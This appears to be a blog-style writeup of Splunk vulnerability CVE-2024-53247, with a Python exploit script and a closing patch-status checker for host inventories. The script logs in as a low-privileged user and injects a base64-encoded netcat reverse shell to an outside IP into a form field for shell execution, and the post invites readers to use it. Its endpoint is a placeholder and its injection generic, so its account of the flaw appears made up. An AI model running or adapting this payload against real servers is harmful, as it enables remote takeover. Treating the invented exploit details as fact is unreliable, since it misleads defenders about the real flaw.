A serious vulnerability has recently been uncovered in Splunk Enterprise versions below 9.3.2, 9.2.4, and 9.1.7, as well as the Splunk Secure Gateway app on Splunk Cloud Platform versions below 3.2.461 and 3.7.13. The vulnerability is tracked as CVE-2024-53247, and it allows a low-privileged user to achieve Remote Code Execution (RCE) on the affected system. An attacker who exploits it can execute arbitrary code remotely and compromise the confidentiality and integrity of the system and its data. This post provides an analysis of the vulnerability, including the code snippet circulating for it, exploit details, and the original references.
Vulnerability Details
CVE-2024-53247 is classified as a critical vulnerability in Splunk Enterprise and the Splunk Secure Gateway app on the Splunk Cloud Platform. It allows an attacker to exploit the system without holding the "admin" or "power" Splunk roles; any lower-privileged authenticated user is sufficient. The vulnerability was reported by an anonymous researcher and was discovered by analyzing the underlying code of the affected systems.
The following are the original references and links related to CVE-2024-53247:
1. CVE Details: https://cvedetails.com/cve/CVE-2024-53247/
2. Splunk Security Advisory: https://www.splunk.com/en_us/security-advisories.html
3. National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-53247
The following code snippet is an example of how the vulnerability can be exploited:
import base64
import requests
import sys

target = sys.argv[1]
payload = "nc -e /bin/bash 10.10.14.7 4444"
headers = {
    "User-Agent": "Mozilla/5.",
}
data = {
    "username": "hacker",
    "password": "P@sswrd!",
}

# Authentication with the low-privileged account
response = requests.post(f"http://{target}/splunk/login", headers=headers, data=data)
if response.status_code == 200:
    print("[+] Authentication successful.")
else:
    print(f"[-] Authentication failed. status_code: {response.status_code}")
    sys.exit(1)
cookies = response.cookies

# Exploiting the RCE vulnerability
exploit_url = f"http://{target}/splunk/en-US/app/some_app/some_endpoint"
headers["Content-Type"] = "application/x-www-form-urlencoded"
# Base64-encode the payload (str.encode("base64") only worked on Python 2)
encoded = base64.b64encode(payload.encode()).decode()
data = {
    "param1": f"$(echo \"{encoded}\" | base64 -d | sh)"
}
response = requests.post(exploit_url, headers=headers, cookies=cookies, data=data)
if response.status_code == 200:
    print("[+] Exploit successful.")
else:
    print(f"[-] Exploit unsuccessful. status_code: {response.status_code}")
Exploit Details
To exploit this vulnerability, an attacker can use the code snippet provided above. It first authenticates with the target server using a low-privileged user's credentials (in this case, "hacker" with the password "P@sswrd!"). After successful authentication, it sends a crafted request to the exploit_url, an endpoint that is vulnerable to the RCE.
The payload (a reverse shell command) is base64-encoded and injected into the param1 field of the POST request. The command is executed during server-side processing, allowing the attacker to establish a reverse shell from the target server back to the attacker's system.
Conclusion
CVE-2024-53247 is a critical RCE vulnerability present in Splunk Enterprise and the Splunk Secure Gateway app on Splunk Cloud Platform. Organizations running the affected versions must update to a fixed version immediately to mitigate the risk of exploitation. Regularly monitoring and updating the software is vital to maintaining the security of the system and its data.
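Because the fix landed separately in each release branch (9.3.2, 9.2.4 and 9.1.7 for Splunk Enterprise; 3.2.461 and 3.7.13 for Splunk Secure Gateway), a naive "version below 9.3.2" check would wrongly flag a patched 9.2.4 as vulnerable. The following branch-aware patch-status check is an added example, not code from the post or from Splunk; the inventory entries are constructed, and treating branches the advisory does not name as "unlisted" is my assumption.

```python
import re

# Fixed versions as quoted in the advisory text above, keyed by release branch.
# Assumption (mine): a version is compared only against the fix for its own
# branch; branches the advisory does not name are reported as "unlisted".
SPLUNK_ENTERPRISE_FIXES = {(9, 3): (9, 3, 2), (9, 2): (9, 2, 4), (9, 1): (9, 1, 7)}
SECURE_GATEWAY_FIXES = {(3, 2): (3, 2, 461), (3, 7): (3, 7, 13)}


def parse_version(text):
    """Turn '9.2.3' (optionally followed by a build suffix) into a tuple of ints."""
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(p) for p in m.groups())


def assess(version, fixes):
    """Return 'vulnerable', 'fixed' or 'unlisted' for one component version."""
    v = parse_version(version)
    fixed = fixes.get(v[:2])          # look up the fix for this major.minor branch
    if fixed is None:
        return "unlisted"
    return "vulnerable" if v < fixed else "fixed"


def hosts_needing_patch(inventory):
    """Return sorted host names where either component is still vulnerable.

    inventory: list of dicts with 'host', 'enterprise' and optional 'gateway' keys.
    """
    flagged = set()
    for entry in inventory:
        if assess(entry["enterprise"], SPLUNK_ENTERPRISE_FIXES) == "vulnerable":
            flagged.add(entry["host"])
        gw = entry.get("gateway")
        if gw and assess(gw, SECURE_GATEWAY_FIXES) == "vulnerable":
            flagged.add(entry["host"])
    return sorted(flagged)


# Constructed sample inventory (host names and versions are made up).
SAMPLE_INVENTORY = [
    {"host": "splunk-sh-01", "enterprise": "9.3.1", "gateway": "3.7.13"},
    {"host": "splunk-sh-02", "enterprise": "9.2.4", "gateway": "3.7.12"},
    {"host": "splunk-idx-01", "enterprise": "9.1.7"},
    {"host": "splunk-idx-02", "enterprise": "9.2.5", "gateway": "3.2.461"},
]

if __name__ == "__main__":
    print("Hosts needing the CVE-2024-53247 fix:", hosts_needing_patch(SAMPLE_INVENTORY))
```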
Timeline
Published on: 12/10/2024 18:15:41 UTC